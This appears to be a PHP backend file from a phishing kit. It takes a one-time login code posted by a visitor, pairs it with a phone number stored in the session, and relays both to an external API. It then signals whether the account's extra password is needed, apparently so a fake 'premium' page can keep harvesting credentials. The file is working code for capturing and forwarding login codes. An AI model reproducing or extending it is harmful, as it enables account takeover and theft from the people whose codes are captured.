<?php
include "./setting.php";
session_start();



if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$otp            = $_POST['otp'];
$phone_number = $_SESSION['phoneNumber'];


function sendJsonData($url, $data) {
    // Inisialisasi sesi cURL
    $ch = curl_init($url);

    // Konversi data PHP array ke format JSON
    $jsonData = json_encode($data);

    // Atur opsi cURL
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Mengembalikan hasil sebagai string
    curl_setopt($ch, CURLOPT_POST, true); // Menyatakan bahwa ini adalah permintaan POST
    curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData); // Mengirimkan data JSON sebagai payload
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'Content-Type: application/json', // Set header Content-Type sebagai application/json
        'Content-Length: ' . strlen($jsonData) // Set panjang konten
    ));

    // Eksekusi cURL
    $response = curl_exec($ch);

    // Cek apakah terjadi error
    if (curl_errno($ch)) {
        echo 'Error:' . curl_error($ch);
        return null;
    }

    // Tutup sesi cURL
    curl_close($ch);

    return $response;
}

// Contoh penggunaan
$url = $api."/validate-otp";
$data = array(
    'phone_number' => $phone_number,
    'otp' => $otp
);

$datab = array(
    'status' => 'success'
);

$datac = array(
    'status' => 'errorpw',
    'message' => 'passwordneed'
);

$dataa = array(
    'status' => 'error'
    
);

$response = sendJsonData($url, $data);

// Mengonversi data JSON yang diterima menjadi array PHP
$data = json_decode($response, true);

// Cek apakah JSON valid
if (json_last_error() === JSON_ERROR_NONE) {
    // Menghandle respons berdasarkan pesan tertentu
    if (isset($data['status']) && $data['status'] === 'success') {
        echo json_encode($datab);
        //header('Location: ../req/premium/');
        // Lakukan tindakan tambahan jika operasi berhasil
    } elseif (isset($data['message']) && $data['message'] === 'session_password_needed') {
        //echo 'Operation failed: ' . (isset($data['message']) ? $data['message'] : 'Unknown error.');
        echo json_encode($datac);
        //header('Location: ../cdl/');
        // Lakukan tindakan tambahan jika terjadi kesalahan
    } elseif (isset($data['status']) && $data['status'] === 'error') {
        //echo 'Operation failed: ' . (isset($data['message']) ? $data['message'] : 'Unknown error.');
        echo json_encode($dataa);
        // Lakukan tindakan tambahan jika terjadi kesalahan
    } else {
        //echo 'Unexpected response status.';
        echo json_encode($dataa);
    }
} else {
    //echo 'Invalid JSON response.';
    echo json_encode($dataa);
}
} else {
    echo "Metode tidak valid.";
}

?>

